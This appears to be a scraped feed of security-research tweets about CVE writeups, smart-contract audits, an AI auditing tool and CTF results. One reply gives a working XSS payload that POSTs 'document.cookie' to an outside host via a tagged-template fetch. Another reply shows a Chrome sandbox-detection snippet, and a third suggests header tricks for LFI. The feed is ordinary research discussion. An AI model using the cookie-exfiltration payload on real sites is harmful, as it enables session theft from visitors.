William Bowling

Here’s a writeup of the recent ExifTool bug (CVE-2021-22204) I discovered while working on the #bugbounty program at @gitlab! Issue was in the DjVu module but can be embedded it most other formats. Make sure to patch GitLab and ExifTool! devcraft.io/2021/05/04/exi…

V12 is now live for open beta. It can: - Find valuable bugs - Generate working, runnable PoC - Generate patch and test the PoC against it In our testing during audits at Zellic, Zenith, and Code4rena we've been consistently impressed. Best of all: it's free. (Don't abuse it!)

Last month, Zellic researcher @farazsth98 gave an internal talk on pwning Linux kernel. He teased an exploit he'd be submitting to a 0day challenge. Today, @farazsth98 and his teammate just won $40,000 for a Linux kernel 0-day! Congratulations Faith!

Bad auditors miss obvious bugs. We built an AI tool that finds them. Introducing V12: the only autonomous Solidity auditor that actually finds Highs and Criticals. We'll be releasing it for free. V12 finds Crits in Zellic audits, High/Mediums in Cantina, and a bug in Pendle.

You’re probably using WebViews wrong. There are a million ways to use a WebView wrong. Properly securing a WebView is hard. In this thread, we’ll cover common vulnerabilities in wallet WebView implementations and the ways to properly secure WebViews.

How to spot misleading audit competition metrics Competitions are crowdsourced audits, where auditors compete to find bugs in a set timeframe. Last year, we acquired @code4rena which does these. We've also seen tons of misleading sales pitches. Here's what to watch out for: 🧵

With the rise of AI agents, we expect new bugs, but we’ve instead found old bugs in disguise. Let’s look at two old-school bugs we found while looking at elizaOS: • An SSRF allowing internal services to be accessed • An LFI allowing host files to be read Let’s dive in 🧵

Just completed my 10th audit as a contractor @zellic_io and these are my top favourite things about this place: 1. They have a diverse and deep talent pool. World top Web security, Cosmos, Rust, Golang, MOVE. They have experts in every direction I want to move into (pun definitely unintended). 2. I still get to be independent, get my own clients, work with other teams. This keeps me fresh, accountable, and at the top of my game. 3. Every time I have asked for a specific type of contract, it magically shows up in my schedule. These past 4 months I've done countless bridges (EVM, OP, Cosmos), Client implementations in rust, governance, staking, etc. Keen to see what they throw at me next!

What happens when Random() isn’t random? Here’s how popular projects, including Proton Wallet and the Dart SDK were all affected by the same underlying weakness we uncovered in the Dart/Flutter ecosystem. All issues found were responsibly disclosed with the vendors. Let’s go 🧵👇

✨ Our judges also decided to give a special mention to @wcbowling for his submission in which the bug allows a `multisig` storage variable to be overwritten, allowing the `emergencyWithdraw` function to be called by an attacker. Read @PatrickAlphaC’s thoughts on this submission! soliditylang.org/blog/2024/10/1…

Version 0.11.0 of gnark was just released, which fixes two vulnerabilities in the Groth16 backend reported by Zellic (CVE-2024-45039, CVE-2024-45040). These affect the soundness and ZK property of generated proofs. Read on for more details and how to check if you're vulnerable.

@ajxchapman Disabling the sandbox also skips setting RLIMIT_DATA on linux, might be able to detect this by creating buffers until it fails, eg on by box `b=[];try{for(i=0;i<64;i++){b.push(new ArrayBuffer(0x40000000))}}catch(e){}` gives 13 when sandboxed vs 15 without source.chromium.org/chromium/chrom…

Is anyone aware of ways to detect whether the Chrome sandbox is enabled from an uncompromised renderer? I had assumed timing Mojo call responses would be enough to detect it, but my (basic) tests showed little reliable difference 🤔

Zellic has moved forward to the final voting phase for @arbitrum's Security Council! We ask delegates to vote for Zellic as the Security Council furthers our mission to maximize TVL and extends our commitment to Arbitrum and its ecosystem. Vote here: tally.xyz/gov/arbitrum/c…

2023 was another great year for the team! 🎉 Blue Water, a collab between perfect blue and @Water_Paddler, placed 1st in CTFtime globally!🏆 🥇1st place in 6 CTFs 💻Hosted a successful pbctf 2023 In the past, we also placed first in 2020 and 2021.✌ Looking forward to 2024!🎆

The dangers of integer truncation: How the Zellic team found a critical vulnerability in the @AstarNetwork. This bug allowed an attacker to drain certain LP contracts on the Astar-EVM, with no bugs required in the contracts. Read more: 🧵👇

Meet Cairo, the native language of Starknet. In this thread we'll: ✅ Introduce Cairo & Starknet ✅ Explore the security features of Cairo ✅ Examine potential pitfalls when writing contracts in Cairo ✅ Give you things to consider when writing secure code Let's dig in👇🧵:

@garethheyes How about: fetch`//aw.rs?${{method:"POST",body:document.cookie}}`

Can you use a tagged template string without parentheses to call fetch and pass a cookie? E.g: fetch`/${document.cookie}` This doesn't work. Can you solve it? We've previously blogged about this. Best answer wins an Ebook copy of JavaScript for hackers. leanpub.com/javascriptforh…

@joaxcar Potentially use X-SendFile or X-Accel-Redirect for LFI if it goes through a proxy?

If I can control response headers on a service, which ones can be abused? Like "Set-Cookie" to set cookies on the domain, "Location" for redirects, and CORS headers to loosen restrictions. What more? The victim is the visitor, I control the response on the target domain. (no XSS)

Earlier this morning, @safemoon's Liquidity Pool was compromised and USD 8.9M worth of tokens were withdrawn. After looking at the transaction trace and the recent contract changes, we can tell you what happened:

@joaxcar Cheers! Finding a CSP bypass for that one was quite a challenge :D

Nice find in the Kroki filter @wcbowling 😀

Writeup for #PBCTF2023 git-ls-api pwnfirstsear.ch/2023/02/22/pbc…